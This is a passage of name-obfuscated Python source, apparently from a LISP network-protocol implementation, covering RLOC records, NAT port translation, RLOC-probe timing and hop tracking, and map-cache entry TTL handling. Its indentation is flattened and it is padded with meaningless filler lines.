if 81 - 81: IiII * iII111i + i1IIi + I1Ii111 / OoO0O00
def print_rloc ( self , indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , Oo0OO0000oooo , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 83 - 83: oO0o / OoO0O00
if 34 - 34: OoooooooOO - i1IIi * O0
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
Ooo000oo0OO0 = self . rloc_name
if ( cour ) : Ooo000oo0OO0 = lisp_print_cour ( Ooo000oo0OO0 )
return ( 'rloc-name: {}' . format ( blue ( Ooo000oo0OO0 , cour ) ) )
if 83 - 83: I1IiiI + OoO0O00
if 41 - 41: Ii1I + II111iiii . OOooOOo * I1Ii111 / II111iiii
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
IIi1I1iII111 = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
if 32 - 32: Oo0Ooo - Ii1I % o0oOOo0O0Ooo
if 15 - 15: iIii1I11I1II1 * I1ii11iIi11i / ooOoO0o * oO0o % OOooOOo
if 62 - 62: Ii1I / Oo0Ooo . OoO0O00 - OOooOOo
if 89 - 89: o0oOOo0O0Ooo % OoO0O00
OooO0ooO0o0OO = self . rloc
if ( OooO0ooO0o0OO . is_null ( ) == False ) :
oOOo0O0O = lisp_get_nat_info ( OooO0ooO0o0OO , self . rloc_name )
if ( oOOo0O0O ) :
IIi1I1iII111 = oOOo0O0O . port
OO000O0OO0 = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
oOo0O = OooO0ooO0o0OO . print_address_no_iid ( )
ii11IiI = red ( oOo0O , False )
IiO00Oo000 = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if 29 - 29: iIii1I11I1II1 / i11iIiiIii + Oo0Ooo
if 99 - 99: I1IiiI - iII111i * Ii1I - OoOoOO00 / i11iIiiIii - i1IIi
if 46 - 46: I1ii11iIi11i * ooOoO0o
if 4 - 4: I1Ii111 * II111iiii
if 4 - 4: ooOoO0o * Oo0Ooo - I1ii11iIi11i % ooOoO0o % OoOoOO00
if 18 - 18: OOooOOo / O0 . OoO0O00 - II111iiii * OOooOOo
if ( oOOo0O0O . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( ii11IiI , IIi1I1iII111 , IiO00Oo000 ) )
if 13 - 13: OoO0O00 % i1IIi . i11iIiiIii / iII111i
if 28 - 28: i1IIi - iII111i + o0oOOo0O0Ooo / Oo0Ooo * oO0o
oOOo0O0O = None if ( oOOo0O0O == OO000O0OO0 ) else OO000O0OO0
if ( oOOo0O0O and oOOo0O0O . timed_out ( ) ) :
IIi1I1iII111 = oOOo0O0O . port
ii11IiI = red ( oOOo0O0O . address , False )
lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( ii11IiI , IIi1I1iII111 ,
# I11i
IiO00Oo000 ) )
oOOo0O0O = None
if 42 - 42: OOooOOo * ooOoO0o / i1IIi . i11iIiiIii - oO0o - Ii1I
if 5 - 5: i1IIi + II111iiii . ooOoO0o
if 21 - 21: i1IIi
if 96 - 96: OoOoOO00 * OoOoOO00 % OoO0O00 * iII111i
if 51 - 51: I1IiiI + i11iIiiIii + iII111i
if 57 - 57: Oo0Ooo . oO0o
if 52 - 52: IiII % OoO0O00 - OoO0O00 . I1IiiI + OoO0O00 * ooOoO0o
if ( oOOo0O0O ) :
if ( oOOo0O0O . address != oOo0O ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( ii11IiI , red ( oOOo0O0O . address , False ) ) )
if 44 - 44: iIii1I11I1II1 / Ii1I - oO0o % i11iIiiIii
self . rloc . store_address ( oOOo0O0O . address )
if 65 - 65: I1ii11iIi11i * Oo0Ooo / Ii1I . OOooOOo * iIii1I11I1II1 + Oo0Ooo
ii11IiI = red ( oOOo0O0O . address , False )
IIi1I1iII111 = oOOo0O0O . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( ii11IiI , IIi1I1iII111 , IiO00Oo000 ) )
if 44 - 44: ooOoO0o * iII111i * IiII % o0oOOo0O0Ooo
self . store_translated_rloc ( OooO0ooO0o0OO , IIi1I1iII111 )
if 45 - 45: OoOoOO00 % o0oOOo0O0Ooo + IiII / i11iIiiIii
if 29 - 29: iIii1I11I1II1 . OoO0O00 / I1IiiI
if 38 - 38: Oo0Ooo / Oo0Ooo % ooOoO0o
if 56 - 56: oO0o / iII111i % i1IIi * II111iiii . Ii1I
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
if 10 - 10: ooOoO0o - I1ii11iIi11i
if 82 - 82: o0oOOo0O0Ooo / I11i - I11i / O0 * I1IiiI / OoO0O00
if 71 - 71: I11i % I11i - i11iIiiIii + iIii1I11I1II1 / iII111i
if 63 - 63: O0 * i11iIiiIii / IiII / IiII
self . rle = rloc_record . rle
if ( self . rle ) :
for Oo0000O00o0 in self . rle . rle_nodes :
Ooo000oo0OO0 = Oo0000O00o0 . rloc_name
oOOo0O0O = lisp_get_nat_info ( Oo0000O00o0 . address , Ooo000oo0OO0 )
if ( oOOo0O0O == None ) : continue
if 72 - 72: i11iIiiIii * OoOoOO00 % oO0o / I1Ii111
IIi1I1iII111 = oOOo0O0O . port
O0Oo0oO0 = Ooo000oo0OO0
if ( O0Oo0oO0 ) : O0Oo0oO0 = blue ( Ooo000oo0OO0 , False )
if 9 - 9: iIii1I11I1II1 . IiII
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( IIi1I1iII111 ,
# I1IiiI + iII111i / Ii1I
Oo0000O00o0 . address . print_address_no_iid ( ) , O0Oo0oO0 ) )
Oo0000O00o0 . translated_port = IIi1I1iII111
if 57 - 57: o0oOOo0O0Ooo
if 69 - 69: i1IIi / i1IIi / OoOoOO00 + ooOoO0o % I1Ii111
if 41 - 41: II111iiii * OOooOOo
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
if 8 - 8: I1Ii111 + O0
if 67 - 67: iIii1I11I1II1 . O0
if 40 - 40: OOooOOo - ooOoO0o . OoooooooOO % O0 * I11i - I1ii11iIi11i
if 92 - 92: ooOoO0o % oO0o / i11iIiiIii
oOOoooo0O0 = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if 68 - 68: I11i / iII111i - IiII . iIii1I11I1II1 / o0oOOo0O0Ooo
if ( rloc_record . keys != None and oOOoooo0O0 ) :
iII1 = rloc_record . keys [ 1 ]
if ( iII1 != None ) :
oOo0O = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( IIi1I1iII111 )
if 54 - 54: II111iiii * I1IiiI
iII1 . add_key_by_rloc ( oOo0O , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( oOo0O , False ) ) )
if 49 - 49: I1ii11iIi11i
if 31 - 31: o0oOOo0O0Ooo - OoOoOO00 + I1ii11iIi11i . oO0o - O0
if 61 - 61: I1ii11iIi11i * II111iiii . i1IIi
return ( IIi1I1iII111 )
if 60 - 60: OoooooooOO % ooOoO0o * i11iIiiIii * OoooooooOO % IiII
if 15 - 15: oO0o
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
if 40 - 40: I1Ii111
if 77 - 77: II111iiii - o0oOOo0O0Ooo . Ii1I
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
if 47 - 47: o0oOOo0O0Ooo % OOooOOo + I1Ii111
if 64 - 64: ooOoO0o / IiII . I1IiiI
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
if 77 - 77: o0oOOo0O0Ooo % I1Ii111 . OOooOOo
return ( True )
if 90 - 90: I11i
if 53 - 53: I1ii11iIi11i + i11iIiiIii / iIii1I11I1II1 + OoooooooOO + IiII * I1IiiI
def is_rtr ( self ) :
return ( ( self . priority == 254 and self . mpriority == 255 and self . weight == 0 and self . mweight == 0 ) )
if 16 - 16: i11iIiiIii - oO0o . i11iIiiIii + OoO0O00 + i11iIiiIii
if 85 - 85: I1ii11iIi11i - ooOoO0o + I1Ii111 + I1Ii111
if 13 - 13: II111iiii
def print_state_change ( self , new_state ) :
iIII1Ii1 = self . print_state ( )
IIIiiiI1Ii1 = "{} -> {}" . format ( iIII1Ii1 , new_state )
if ( new_state == "up" and self . unreach_state ( ) ) :
IIIiiiI1Ii1 = bold ( IIIiiiI1Ii1 , False )
if 53 - 53: i1IIi . OoooooooOO
return ( IIIiiiI1Ii1 )
if 56 - 56: OoooooooOO
if 93 - 93: OoOoOO00
def print_rloc_probe_rtt ( self ) :
if ( self . rloc_probe_rtt == - 1 ) : return ( "none" )
return ( self . rloc_probe_rtt )
if 48 - 48: i1IIi
if 22 - 22: iII111i / OoO0O00 * OOooOOo + I11i
def print_recent_rloc_probe_rtts ( self ) :
o000Oo00oOoO = str ( self . recent_rloc_probe_rtts )
o000Oo00oOoO = o000Oo00oOoO . replace ( "-1" , "?" )
return ( o000Oo00oOoO )
if 28 - 28: I1Ii111 / oO0o % OoooooooOO - I1IiiI / I1IiiI
if 73 - 73: I11i - i1IIi / i11iIiiIii / I1Ii111
def compute_rloc_probe_rtt ( self ) :
i11 = self . rloc_probe_rtt
self . rloc_probe_rtt = - 1
if ( self . last_rloc_probe_reply == None ) : return
if ( self . last_rloc_probe == None ) : return
self . rloc_probe_rtt = self . last_rloc_probe_reply - self . last_rloc_probe
self . rloc_probe_rtt = round ( self . rloc_probe_rtt , 3 )
II1IIIII1III1 = self . recent_rloc_probe_rtts
self . recent_rloc_probe_rtts = [ i11 ] + II1IIIII1III1 [ 0 : - 1 ]
if 67 - 67: I1ii11iIi11i - ooOoO0o - Ii1I - OoO0O00 % OoooooooOO
if 22 - 22: oO0o * i1IIi
def print_rloc_probe_hops ( self ) :
return ( self . rloc_probe_hops )
if 54 - 54: I1IiiI * I1IiiI % IiII - i11iIiiIii * o0oOOo0O0Ooo
if 38 - 38: OoOoOO00 / OOooOOo % OoooooooOO * I1ii11iIi11i
def print_recent_rloc_probe_hops ( self ) :
I1IiiI1iIIi1i = str ( self . recent_rloc_probe_hops )
return ( I1IiiI1iIIi1i )
if 46 - 46: II111iiii * iII111i . iII111i % oO0o - i11iIiiIii . I11i
if 74 - 74: OoO0O00 * iII111i / OoO0O00 % Oo0Ooo / i1IIi
def store_rloc_probe_hops ( self , to_hops , from_ttl ) :
if ( to_hops == 0 ) :
to_hops = "?"
elif ( to_hops < LISP_RLOC_PROBE_TTL / 2 ) :
to_hops = "!"
else :
to_hops = str ( LISP_RLOC_PROBE_TTL - to_hops )
if 77 - 77: IiII % iIii1I11I1II1 / iIii1I11I1II1 * iII111i * Ii1I + I1Ii111
if ( from_ttl < LISP_RLOC_PROBE_TTL / 2 ) :
IIiiII11iiii = "!"
else :
IIiiII11iiii = str ( LISP_RLOC_PROBE_TTL - from_ttl )
if 15 - 15: i11iIiiIii % I1ii11iIi11i % Oo0Ooo
if 65 - 65: II111iiii - i1IIi . I1ii11iIi11i . I11i % OoO0O00 . OoooooooOO
i11 = self . rloc_probe_hops
self . rloc_probe_hops = to_hops + "/" + IIiiII11iiii
II1IIIII1III1 = self . recent_rloc_probe_hops
self . recent_rloc_probe_hops = [ i11 ] + II1IIIII1III1 [ 0 : - 1 ]
if 64 - 64: I11i * Oo0Ooo / IiII / II111iiii
if 29 - 29: OoooooooOO - OoO0O00 - Ii1I
def process_rloc_probe_reply ( self , nonce , eid , group , hop_count , ttl ) :
OooO0ooO0o0OO = self
while ( True ) :
if ( OooO0ooO0o0OO . last_rloc_probe_nonce == nonce ) : break
OooO0ooO0o0OO = OooO0ooO0o0OO . next_rloc
if ( OooO0ooO0o0OO == None ) :
lprint ( " No matching nonce state found for nonce 0x{}" . format ( lisp_hex_string ( nonce ) ) )
if 82 - 82: IiII - I1IiiI . iII111i % I11i % Ii1I + iII111i
return
if 87 - 87: i11iIiiIii % i1IIi
if 63 - 63: I1ii11iIi11i + iII111i * o0oOOo0O0Ooo % II111iiii
if 23 - 23: i1IIi * oO0o * oO0o . i11iIiiIii / o0oOOo0O0Ooo
OooO0ooO0o0OO . last_rloc_probe_reply = lisp_get_timestamp ( )
OooO0ooO0o0OO . compute_rloc_probe_rtt ( )
Oooo = OooO0ooO0o0OO . print_state_change ( "up" )
if ( OooO0ooO0o0OO . state != LISP_RLOC_UP_STATE ) :
lisp_update_rtr_updown ( OooO0ooO0o0OO . rloc , True )
OooO0ooO0o0OO . state = LISP_RLOC_UP_STATE
OooO0ooO0o0OO . last_state_change = lisp_get_timestamp ( )
OoOoooooO00oo = lisp_map_cache . lookup_cache ( eid , True )
if ( OoOoooooO00oo ) : lisp_write_ipc_map_cache ( True , OoOoooooO00oo )
if 50 - 50: o0oOOo0O0Ooo - O0 + OoO0O00
if 22 - 22: I1Ii111 % O0 / I1Ii111 / I1Ii111
OooO0ooO0o0OO . store_rloc_probe_hops ( hop_count , ttl )
if 64 - 64: Oo0Ooo + iIii1I11I1II1 % i1IIi
Ii1I11IiI1I1 = bold ( "RLOC-probe reply" , False )
oOo0O = OooO0ooO0o0OO . rloc . print_address_no_iid ( )
I1i1IIiI = bold ( str ( OooO0ooO0o0OO . print_rloc_probe_rtt ( ) ) , False )
iIiiI11II11 = ":{}" . format ( self . translated_port ) if self . translated_port != 0 else ""
if 86 - 86: i1IIi
I1ii1I1II11II = ""
if ( OooO0ooO0o0OO . rloc_next_hop != None ) :
Ii , oooOoo0 = OooO0ooO0o0OO . rloc_next_hop
I1ii1I1II11II = ", nh {}({})" . format ( oooOoo0 , Ii )
if 82 - 82: I11i * Ii1I
if 55 - 55: IiII / OoooooooOO
o0OoO00 = green ( lisp_print_eid_tuple ( eid , group ) , False )
lprint ( ( " Received {} from {}{} for {}, {}, rtt {}{}, " + "to-ttl/from-ttl {}" ) . format ( Ii1I11IiI1I1 , red ( oOo0O , False ) , iIiiI11II11 , o0OoO00 ,
# iIii1I11I1II1 . O0
Oooo , I1i1IIiI , I1ii1I1II11II , str ( hop_count ) + "/" + str ( ttl ) ) )
if 61 - 61: OoOoOO00 * OOooOOo
if ( OooO0ooO0o0OO . rloc_next_hop == None ) : return
if 3 - 3: I1IiiI + Oo0Ooo / I1Ii111
if 17 - 17: i11iIiiIii / Oo0Ooo . o0oOOo0O0Ooo / I1IiiI . OOooOOo
if 10 - 10: I11i - OoOoOO00
if 49 - 49: I1ii11iIi11i / II111iiii - ooOoO0o / I1Ii111 - oO0o
OooO0ooO0o0OO = None
O0o0O000oo = None
while ( True ) :
OooO0ooO0o0OO = self if OooO0ooO0o0OO == None else OooO0ooO0o0OO . next_rloc
if ( OooO0ooO0o0OO == None ) : break
if ( OooO0ooO0o0OO . up_state ( ) == False ) : continue
if ( OooO0ooO0o0OO . rloc_probe_rtt == - 1 ) : continue
if 27 - 27: OoOoOO00 % OoooooooOO
if ( O0o0O000oo == None ) : O0o0O000oo = OooO0ooO0o0OO
if ( OooO0ooO0o0OO . rloc_probe_rtt < O0o0O000oo . rloc_probe_rtt ) : O0o0O000oo = OooO0ooO0o0OO
if 77 - 77: Ii1I % Oo0Ooo
if 30 - 30: iIii1I11I1II1 * Oo0Ooo * OOooOOo * ooOoO0o
if ( O0o0O000oo != None ) :
Ii , oooOoo0 = O0o0O000oo . rloc_next_hop
I1ii1I1II11II = bold ( "nh {}({})" . format ( oooOoo0 , Ii ) , False )
lprint ( " Install host-route via best {}" . format ( I1ii1I1II11II ) )
lisp_install_host_route ( oOo0O , None , False )
lisp_install_host_route ( oOo0O , oooOoo0 , True )
if 6 - 6: iIii1I11I1II1 / oO0o % ooOoO0o
if 19 - 19: iIii1I11I1II1 + I11i - iIii1I11I1II1 - Ii1I . Ii1I * OoO0O00
if 32 - 32: I1IiiI + OOooOOo * oO0o
def add_to_rloc_probe_list ( self , eid , group ) :
oOo0O = self . rloc . print_address_no_iid ( )
IIi1I1iII111 = self . translated_port
if ( IIi1I1iII111 != 0 ) : oOo0O += ":" + str ( IIi1I1iII111 )
if 100 - 100: OoO0O00
if ( lisp_rloc_probe_list . has_key ( oOo0O ) == False ) :
lisp_rloc_probe_list [ oOo0O ] = [ ]
if 20 - 20: Ii1I % OoO0O00
if 85 - 85: i1IIi % iIii1I11I1II1
if ( group . is_null ( ) ) : group . instance_id = 0
for O0OooO0oo , o0OoO00 , II1IIiIiiI1iI in lisp_rloc_probe_list [ oOo0O ] :
if ( o0OoO00 . is_exact_match ( eid ) and II1IIiIiiI1iI . is_exact_match ( group ) ) :
if ( O0OooO0oo == self ) :
if ( lisp_rloc_probe_list [ oOo0O ] == [ ] ) :
lisp_rloc_probe_list . pop ( oOo0O )
if 10 - 10: O0 . oO0o * I1IiiI
return
if 21 - 21: OoooooooOO
lisp_rloc_probe_list [ oOo0O ] . remove ( [ O0OooO0oo , o0OoO00 , II1IIiIiiI1iI ] )
break
if 76 - 76: i1IIi * i11iIiiIii / OOooOOo + I1Ii111
if 50 - 50: oO0o % OoOoOO00 + I1IiiI
lisp_rloc_probe_list [ oOo0O ] . append ( [ self , eid , group ] )
if 15 - 15: II111iiii - iII111i / I1ii11iIi11i
if 81 - 81: Ii1I - i1IIi % oO0o * Oo0Ooo * OoOoOO00
if 79 - 79: oO0o + I1IiiI % iII111i + II111iiii % OoO0O00 % iII111i
if 46 - 46: o0oOOo0O0Ooo
if 61 - 61: OoO0O00 . O0 + I1ii11iIi11i + OoO0O00
OooO0ooO0o0OO = lisp_rloc_probe_list [ oOo0O ] [ 0 ] [ 0 ]
if ( OooO0ooO0o0OO . state == LISP_RLOC_UNREACH_STATE ) :
self . state = LISP_RLOC_UNREACH_STATE
self . last_state_change = lisp_get_timestamp ( )
if 44 - 44: I11i . oO0o
if 65 - 65: I1ii11iIi11i * II111iiii % I11i + II111iiii . i1IIi / ooOoO0o
if 74 - 74: OoOoOO00 % OoO0O00 . OoOoOO00
def delete_from_rloc_probe_list ( self , eid , group ) :
oOo0O = self . rloc . print_address_no_iid ( )
IIi1I1iII111 = self . translated_port
if ( IIi1I1iII111 != 0 ) : oOo0O += ":" + str ( IIi1I1iII111 )
if ( lisp_rloc_probe_list . has_key ( oOo0O ) == False ) : return
if 16 - 16: OoO0O00 / Ii1I * i11iIiiIii / o0oOOo0O0Ooo + I1Ii111
i1IiI1IIIIi = [ ]
for iIiiiIIiii in lisp_rloc_probe_list [ oOo0O ] :
if ( iIiiiIIiii [ 0 ] != self ) : continue
if ( iIiiiIIiii [ 1 ] . is_exact_match ( eid ) == False ) : continue
if ( iIiiiIIiii [ 2 ] . is_exact_match ( group ) == False ) : continue
i1IiI1IIIIi = iIiiiIIiii
break
if 51 - 51: iIii1I11I1II1 * Oo0Ooo + ooOoO0o
if ( i1IiI1IIIIi == [ ] ) : return
if 58 - 58: I11i / i11iIiiIii . iII111i
try :
lisp_rloc_probe_list [ oOo0O ] . remove ( i1IiI1IIIIi )
if ( lisp_rloc_probe_list [ oOo0O ] == [ ] ) :
lisp_rloc_probe_list . pop ( oOo0O )
if 80 - 80: II111iiii + OoO0O00 % ooOoO0o + i11iIiiIii
except :
return
if 30 - 30: Ii1I / I1ii11iIi11i % IiII - Oo0Ooo
if 100 - 100: IiII . I1Ii111 * oO0o % OoO0O00 . iIii1I11I1II1 * Oo0Ooo
if 100 - 100: IiII - OoOoOO00 % iII111i
def print_rloc_probe_state ( self , trailing_linefeed ) :
o0OooooOoOO = ""
OooO0ooO0o0OO = self
while ( True ) :
iIII = OooO0ooO0o0OO . last_rloc_probe
if ( iIII == None ) : iIII = 0
IiiIii = OooO0ooO0o0OO . last_rloc_probe_reply
if ( IiiIii == None ) : IiiIii = 0
I1i1IIiI = OooO0ooO0o0OO . print_rloc_probe_rtt ( )
o0 = space ( 4 )
if 52 - 52: O0 - I1Ii111 + oO0o % ooOoO0o . oO0o
if ( OooO0ooO0o0OO . rloc_next_hop == None ) :
o0OooooOoOO += "RLOC-Probing:\n"
else :
Ii , oooOoo0 = OooO0ooO0o0OO . rloc_next_hop
o0OooooOoOO += "RLOC-Probing for nh {}({}):\n" . format ( oooOoo0 , Ii )
if 60 - 60: oO0o + o0oOOo0O0Ooo - OOooOOo % o0oOOo0O0Ooo . I11i + OoO0O00
if 27 - 27: i11iIiiIii - I1ii11iIi11i * I1Ii111 . I1IiiI / OoO0O00 * ooOoO0o
o0OooooOoOO += ( "{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + "received: {}, rtt {}" ) . format ( o0 , lisp_print_elapsed ( iIII ) ,
# OOooOOo . OoO0O00 + OoO0O00
o0 , lisp_print_elapsed ( IiiIii ) , I1i1IIiI )
if 19 - 19: iII111i * i1IIi / iII111i
if ( trailing_linefeed ) : o0OooooOoOO += "\n"
if 21 - 21: ooOoO0o / o0oOOo0O0Ooo % I1ii11iIi11i . Ii1I . IiII
OooO0ooO0o0OO = OooO0ooO0o0OO . next_rloc
if ( OooO0ooO0o0OO == None ) : break
o0OooooOoOO += "\n"
if 8 - 8: I1ii11iIi11i / ooOoO0o + II111iiii
return ( o0OooooOoOO )
if 45 - 45: ooOoO0o - OOooOOo * IiII % iII111i . OoOoOO00 / i11iIiiIii
if 63 - 63: Oo0Ooo * iIii1I11I1II1 / ooOoO0o
def get_encap_keys ( self ) :
IIi1I1iII111 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 46 - 46: OoOoOO00 / iII111i - OoO0O00 . o0oOOo0O0Ooo
oOo0O = self . rloc . print_address_no_iid ( ) + ":" + IIi1I1iII111
if 50 - 50: I1Ii111 . O0 . OoOoOO00 + I1Ii111 + OoooooooOO . i11iIiiIii
try :
O0000 = lisp_crypto_keys_by_rloc_encap [ oOo0O ]
if ( O0000 [ 1 ] ) : return ( O0000 [ 1 ] . encrypt_key , O0000 [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 65 - 65: I1IiiI % iIii1I11I1II1
if 52 - 52: I1IiiI
if 19 - 19: I1IiiI
def rloc_recent_rekey ( self ) :
IIi1I1iII111 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 17 - 17: I11i + OoooooooOO
oOo0O = self . rloc . print_address_no_iid ( ) + ":" + IIi1I1iII111
if 63 - 63: IiII
try :
iII1 = lisp_crypto_keys_by_rloc_encap [ oOo0O ] [ 1 ]
if ( iII1 == None ) : return ( False )
if ( iII1 . last_rekey == None ) : return ( True )
return ( time . time ( ) - iII1 . last_rekey < 1 )
except :
return ( False )
if 3 - 3: oO0o * II111iiii . O0
if 19 - 19: I1IiiI / I1IiiI / Oo0Ooo + oO0o + i1IIi
if 31 - 31: iII111i / OoooooooOO - I1Ii111 . iII111i
if 38 - 38: ooOoO0o . OoooooooOO - II111iiii * i11iIiiIii / i1IIi . OoooooooOO
class lisp_mapping ( ) :
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
self . map_cache_ttl = None
self . last_refresh_time = self . uptime
self . source_cache = None
self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
if 51 - 51: oO0o - I1ii11iIi11i + I1ii11iIi11i
if 100 - 100: I11i - I1ii11iIi11i . i1IIi
def print_mapping ( self , eid_indent , rloc_indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
oOoooOOO0o0 = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
if 85 - 85: II111iiii
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , oOoooOOO0o0 , Oo0OO0000oooo ,
len ( self . rloc_set ) ) )
for OooO0ooO0o0OO in self . rloc_set : OooO0ooO0o0OO . print_rloc ( rloc_indent )
if 58 - 58: i1IIi - OoO0O00 + ooOoO0o
if 6 - 6: IiII % I1IiiI + OoooooooOO * oO0o . iII111i + oO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 4 - 4: I11i % I1IiiI
if 72 - 72: I1IiiI % II111iiii % iII111i / OoOoOO00
def print_ttl ( self ) :
oo0OOoOO0 = self . map_cache_ttl
if ( oo0OOoOO0 == None ) : return ( "forever" )
if 96 - 96: OoOoOO00 % Ii1I
if ( oo0OOoOO0 >= 3600 ) :
if ( ( oo0OOoOO0 % 3600 ) == 0 ) :
oo0OOoOO0 = str ( oo0OOoOO0 / 3600 ) + " hours"
else :
oo0OOoOO0 = str ( oo0OOoOO0 * 60 ) + " mins"
if 50 - 50: IiII - II111iiii
elif ( oo0OOoOO0 >= 60 ) :
if ( ( oo0OOoOO0 % 60 ) == 0 ) :
oo0OOoOO0 = str ( oo0OOoOO0 / 60 ) + " mins"
else :
oo0OOoOO0 = str ( oo0OOoOO0 ) + " secs"
if 10 - 10: OoooooooOO % Ii1I * OOooOOo + IiII * oO0o
else :
oo0OOoOO0 = str ( oo0OOoOO0 ) + " secs"
if 13 - 13: II111iiii
return ( oo0OOoOO0 )
if 14 - 14: i11iIiiIii . IiII
if 70 - 70: Oo0Ooo * OOooOOo + I1Ii111 % OoOoOO00 / O0
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
o0O0oO0 = time . time ( ) - self . last_refresh_time
if ( o0O0oO0 >= self . map_cache_ttl ) : return ( True )
if 23 - 23: O0 * oO0o / I1IiiI + i1IIi * O0 % oO0o
if 11 - 11: I1Ii111 . OoooooooOO * iIii1I11I1II1 / I1ii11iIi11i - ooOoO0o . iII111i
if 71 - 71: i11iIiiIii + I11i / i11iIiiIii % Oo0Ooo / iIii1I11I1II1 * OoO0O00
if 49 - 49: iII111i + OoOoOO00
if 33 - 33: ooOoO0o
i1111111II = self . map_cache_ttl - ( self . map_cache_ttl / 10 )
if ( o0O0oO0 >= i1111111II ) : return ( True )
return ( False )
if 58 - 58: o0oOOo0O0Ooo
if 5 - 5: O0
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
o0O0oO0 = time . time ( ) - self . stats . last_increment
return ( o0O0oO0 <= 60 )
if 23 - 23: OOooOOo . i11iIiiIii % o0oOOo0O0Ooo - OoOoOO00 * OoooooooOO - OoO0O00
if 51 - 51: iIii1I11I1II1 / I1ii11iIi11i
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 83 - 83: ooOoO0o % I1IiiI - OoOoOO00 - I11i
if 12 - 12: I1Ii111 . OoO0O00 + I11i * OoO0O00 - IiII + I11i
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 98 - 98: iII111i . I1Ii111 * IiII - Ii1I * OoooooooOO
if 13 - 13: iII111i
def delete_rlocs_from_rloc_probe_list ( self ) :
for OooO0ooO0o0OO in self . best_rloc_set :
OooO0ooO0o0OO . delete_from_rloc_probe_list ( self . eid , self . group )
if 76 - 76: iIii1I11I1II1 + Oo0Ooo
if 40 - 40: oO0o % i1IIi % ooOoO0o . oO0o % oO0o
if 69 - 69: OoooooooOO . oO0o / OoooooooOO / OoOoOO00
def build_best_rloc_set ( self ) :
I1iIiI = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
if 89 - 89: ooOoO0o * Ii1I * Oo0Ooo * O0
if 25 - 25: o0oOOo0O0Ooo + I1ii11iIi11i * oO0o / IiII - Ii1I
if 85 - 85: Oo0Ooo . i11iIiiIii % oO0o
if 60 - 60: OOooOOo
IIii1IiI = 256
for OooO0ooO0o0OO in self . rloc_set :
if ( OooO0ooO0o0OO . up_state ( ) ) : IIii1IiI = min ( OooO0ooO0o0OO . priority , IIii1IiI )
if 90 - 90: i11iIiiIii / i1IIi * Oo0Ooo / OoO0O00 * I1ii11iIi11i + I1ii11iIi11i
if 36 - 36: Ii1I . OOooOOo * iIii1I11I1II1 - i1IIi
if 38 - 38: Oo0Ooo . o0oOOo0O0Ooo % oO0o / i11iIiiIii * OoO0O00 % OoOoOO00
if 18 - 18: OOooOOo
if 12 - 12: I1Ii111 % II111iiii / o0oOOo0O0Ooo - iIii1I11I1II1 + II111iiii
if 41 - 41: OOooOOo
if 8 - 8: i11iIiiIii . IiII . I1ii11iIi11i + i1IIi % I1Ii111
if 64 - 64: I1IiiI . Oo0Ooo * OoO0O00
if 87 - 87: i1IIi / OoooooooOO
if 68 - 68: I1Ii111 / iIii1I11I1II1
for OooO0ooO0o0OO in self . rloc_set :
if ( OooO0ooO0o0OO . priority <= IIii1IiI ) :
